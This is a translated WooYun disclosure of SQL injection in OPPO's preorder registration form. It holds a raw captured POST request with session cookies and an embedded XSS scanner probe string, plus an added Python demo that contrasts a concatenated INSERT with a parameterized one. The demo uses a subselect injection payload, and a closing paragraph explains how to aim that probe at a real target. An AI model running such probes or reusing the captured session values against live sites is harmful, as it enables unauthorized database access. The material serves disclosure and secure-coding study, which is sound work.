Vulnerability summary

Defect ID: wooyun-2015-0154014

Title: SQL injection in the OPPO main site

Vendor: 广东欧珀移动通讯有限公司 (OPPO)

Author: 路人甲

Submitted: 2015-11-19 10:36

Fix time: 2015-11-25 09:00

Disclosed: 2015-11-25 09:00

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: vendor notified, vendor ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-11-19: details sent to the vendor, awaiting vendor handling
2015-11-25: vendor chose to ignore the vulnerability; details disclosed to the public

Brief description:

Detailed description:

POST /my/r7-plus-preorder/Registration.php HTTP/1.1
Content-Length: 423
Content-Type: application/x-www-form-urlencoded
Cookie: oppo_session=eyJpdiI6InBhVURVXC9CS2pORm13RTFFdExIU3h3PT0iLCJ2YWx1ZSI6InR4eUNyVDkyQURJcmpTbjNnY2RQZ25ucEVLdFZ0Q3pcL1BReUExXC9SbVhPZHM3TXRmQmMzdjZaZ252NE43XC9NSjVVVXF1MUNwUnRhOHd1RW5iM2VJWTBBPT0iLCJtYWMiOiIxMGZiNmJlNWY3ZGFkZTAyMmZkZDYxNGVhNzY5MGMwZjdiYmQyMTRjYTAxYTM5ZjJmNjQ0OTZmYTE4YzI1MzcxIn0%3D; en=eyJpdiI6IngzTFpOZmFkZ28rcnpMT2FHTUNXM2c9PSIsInZhbHVlIjoiUFB2dXNPVDExRlJqbXpmdXdESzdOUlJiZGJQMXdUNVZRckRTN1VCUXNVUEZKbEI2UzhZVVRBRXM4Qmo1Vjd1elhTWlJNOVg4XC94Y094QThRaU1SOEtBPT0iLCJtYWMiOiI3OTE3M2UxMTZjZTNkNDhhNzUxNjZhZDg4ZDg2YmYxNTNkOTE0ZDkyZDg1MzZmZGE0ZWNkMWZlNGQ2NzBlYWZhIn0%3D; laravel_session=eyJpdiI6IklrUkVQWGh2a1AxMDk0N2VaSHRxN2c9PSIsInZhbHVlIjoiY3VCbzh1alBTZzd5YVhEdEs0V2hpWHpRQ0Zrekp0dThhcVpCcVFCZE51UXpZXC95ak9wWnpDaVwvXC9LM1JGQndUR05NNlhWSm4zRWphcnZZZHFpKzJ2clE9PSIsIm1hYyI6ImM1MTAxMjk2MjRlZTZjMzRhYjYyZWM0MDQ2OGEwMGY2YzA4YWVlZDE1M2E4M2M4ZmI2MjU2YTI1ZmY1MTI3MGYifQ%3D%3D; 97526a62b6f96ebafb6ea58e8c088533=54j3qs12as7bv58m2ecesn82s0; PHPSESSID=abtppag7ft3anqr3qa6cud8pq7; frontend=dsd64qp9g455n17nd5pukkaqg2; nf_wp_session=793fddc88e46249327c0a90dff931e96%7C%7C1447523562%7C%7C1447523502; bmec=0f9bd21f216ddfddef1671ab66504fc1; wordpress_test_cookie=WP+Cookie+check; Hm_lvt_f18367c55fd7569d9000cd9986846577=1447523250,1447523333,1447525836,1447529536; Hm_lpvt_f18367c55fd7569d9000cd9986846577=1447529536; BAIDUID=1F69F639118F984B8D2DDB33A0FD6586:FG=1; HMACCOUNT=7BB432FFBC83C70F; Hm_lvt_9cb8846b548404438c81aaa02eda4f0f=1447523329,1447523333,1447523342,1447529547; Hm_lpvt_9cb8846b548404438c81aaa02eda4f0f=1447529547; UNID=9F4E727C02AE64564771D2; __cs_visitor=1447522791107363; __v3_cs_skey_10034=d307fe; __utmt=1; __utma=171233918.1111442545.1447522819.1447522819.1447522819.1; __utmb=171233918.2.10.1447522819; __utmc=171233918; __utmz=171233918.1447522819.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); shopGoodsId=513; _ga=GA1.2.1111442545.1447522819; _gat=1; _dc_gtm_UA-53259506-1=1; oppocom=a%3A8%3A%7Bs%3A7%3A%22REQUEST%22%3Bi%3A43685%3Bs%3A7%3A%22CHARSET%22%3Bs%3A5%3A%22utf-8%22%3Bs%3A6%3A%22USERID%22%3Bs%3A1%3A%220%22%3Bs%3A8%3A%22DOMAINID%22%3Bi%3A1%3Bs%3A7%3A%22AGENTID%22%3Bi%3A0%3Bs%3A8%3A%22LANGUAGE%22%3Bs%3A2%3A%22sp%22%3Bs%3A7%3A%22SERVICE%22%3Bs%3A1%3A%221%22%3Bs%3A14%3A%22GUEST_LOGIN_ID%22%3Bs%3A1%3A%220%22%3B%7D; _gat_UA-54439508-1=1; _gat_UA-39533684-1=1; bannerslider_user_code_impress3=39a97a28fd77f54b76af179dac178635; bannerslider_user_code_click50=0826c53292cfc2240cdcc40aea1b98fa; bannerslider_user_code_click51=d22ad251caa88eaa1cb922162b7c7349; external_no_cache=1; __atuvc=4%7C46; __atuvs=564777c3628394dc003
Host: www.oppo.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

email=sample%40email.tst&icnumber=1111&location=1&name=bikrgyhm&phonenumber=555-666-0606&state=NY&store=1

[image: 1.png]
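The report gives only the captured request: it names no injectable parameter and no payload, and the __utmz cookie shows the capture came from an Acunetix scan (acunetix-referrer.com). What follows is an added example, not the report author's code and not OPPO's. It models the Registration.php handler in Python over an in-memory SQLite table whose name and columns are invented to mirror the seven posted fields, places the concatenated INSERT (the coding pattern such a finding implies) beside the parameterized one, and probes each with a scalar-subselect payload in the name field (the choice of field is an assumption) to show how to confirm an injection from what the back end actually stores rather than from an error page.

```python
import sqlite3
from urllib.parse import parse_qs

# Form body exactly as it appears in the captured request above.
CAPTURED_BODY = ("email=sample%40email.tst&icnumber=1111&location=1&name=bikrgyhm"
                 "&phonenumber=555-666-0606&state=NY&store=1")
FIELDS = ("email", "icnumber", "location", "name", "phonenumber", "state", "store")


def parse_form(body):
    """Decode the x-www-form-urlencoded body into the seven fields the form posts."""
    parsed = parse_qs(body, keep_blank_values=True)
    return {f: parsed[f][0] for f in FIELDS}


def make_db():
    """Throwaway SQLite database standing in for the real back end.
    Assumption: the table name and columns are invented to mirror the form."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE preorder (id INTEGER PRIMARY KEY, email TEXT, icnumber TEXT, "
        "location TEXT, name TEXT, phonenumber TEXT, state TEXT, store TEXT)"
    )
    return conn


def last_name(conn):
    """Return the name column of the most recently inserted row."""
    return conn.execute("SELECT name FROM preorder ORDER BY id DESC LIMIT 1").fetchone()[0]


def insert_vulnerable(conn, form):
    """Hypothetical handler that splices form values straight into the SQL text.
    This is the pattern a SQL injection in a form like this implies; it is not
    OPPO's code. Any quote in the input is interpreted by the database."""
    sql = (
        "INSERT INTO preorder (email, icnumber, location, name, phonenumber, state, store) "
        "VALUES ('{email}', '{icnumber}', '{location}', '{name}', "
        "'{phonenumber}', '{state}', '{store}')"
    ).format(**form)
    conn.execute(sql)
    return last_name(conn)


def insert_safe(conn, form):
    """Hardened handler: bound parameters keep every value as data, so the
    payload below is stored verbatim instead of being evaluated."""
    sql = (
        "INSERT INTO preorder (email, icnumber, location, name, phonenumber, state, store) "
        "VALUES (?, ?, ?, ?, ?, ?, ?)"
    )
    conn.execute(sql, tuple(form[f] for f in FIELDS))
    return last_name(conn)


# Scalar-subselect payload: if the quotes reach the SQL parser, the concatenated
# text becomes '' || (SELECT sqlite_version()) || '' and the stored name is the
# database version rather than the literal string we sent.
PROBE = "' || (SELECT sqlite_version()) || '"


def probe(handler, field="name"):
    """Submit the captured form with PROBE in one field against a fresh
    database and return what the handler stored for that row."""
    form = parse_form(CAPTURED_BODY)
    form[field] = PROBE
    return handler(make_db(), form)


def is_injectable(handler, field="name"):
    """True when the stored value differs from the literal we sent, i.e. the
    database evaluated our input as SQL."""
    return probe(handler, field) != PROBE


def db_version():
    """Version string the vulnerable path is expected to leak into the row."""
    return sqlite3.sqlite_version


if __name__ == "__main__":
    for h in (insert_vulnerable, insert_safe):
        print(f"{h.__name__}: stored={probe(h)!r} injectable={is_injectable(h)}")
```

The same probe transfers to a real target by replacing make_db and the handler call with the POST and a read-back of the created record (or its confirmation page); a stored value that differs from what was sent is a clean, low-noise confirmation that does not rely on error messages or timing.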

Proof of vulnerability:

Fix recommendation:

Copyright notice: credit 路人甲@乌云 (WooYun) when reproducing


Vulnerability response

Vendor response:

Severity: no impact, ignored by vendor

Ignored on: 2015-11-25 09:00

Vendor reply:

Vulnerability Rank: 15 (WooYun rating)

Latest status:

None